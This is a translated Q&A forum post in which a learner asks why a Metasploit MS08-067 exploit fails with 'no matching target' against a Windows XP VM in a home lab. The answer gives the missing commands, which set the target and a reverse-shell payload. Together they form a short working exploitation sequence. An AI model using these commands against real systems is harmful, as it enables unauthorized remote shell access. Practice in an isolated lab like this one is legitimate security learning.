我收到此 Metasploit 错误:“由于失败而中止漏洞利用:无目标:没有匹配的目标”

我收到此 Metasploit 错误:“由于失败而中止漏洞利用:无目标:没有匹配的目标”

目前正在主机专用适配器上运行两个虚拟机以供练习,一个是 Kali Linux,另一个是 Microsoft Windows XP SP2。

我正尝试通过常见漏洞访问 Windows XP VM windows/smb/ms08_067_netapi,但一直收到错误。

“由于失败而中止漏洞利用:无目标:没有匹配的目标”

以下是我为了获得此信息所做的事情。

service postgresql start
msfconsole
nmap 192.168.56.101 (remember it's in a host-only adapter, not sure if this is why I am experiencing this)
Receive 4 open ports, 445 included.
I set the LHOST as my Attackers IP
I set RHOST to the Attackee
I check if it is vulnerable to the exploit - It confirms
[*] Started reverse TCP handler on 192.168.xx.xxxx:4444  
[*] 192.168.xx.xxxx:445 - Automatically detecting the target...
[*] 192.168.xx.xxxx:445 - Fingerprint: Windows XP - Service Pack 1 - lang:Unknown
[*] 192.168.xx.xxxx:445 - We could not detect the language pack, defaulting to English
[-] 192.168.xx.xxxx:445 - Exploit aborted due to failure: no-target: No matching target
[*] Exploit completed, but no session was created.

解决方案真的就在我眼前吗?它会是什么呢?

答案1

根据这篇文章 Metasploit 初学者基础知识 – 使用 Metasploit (Kali Linux) 漏洞利用 Windows XP (MS08–067) – 第 1 部分,您还应设置以下内容:

show targets
set Target (Target Number)
set payload windows/shell_reverse_tcp
exploit

请参阅文章以了解更多详细信息。

相关内容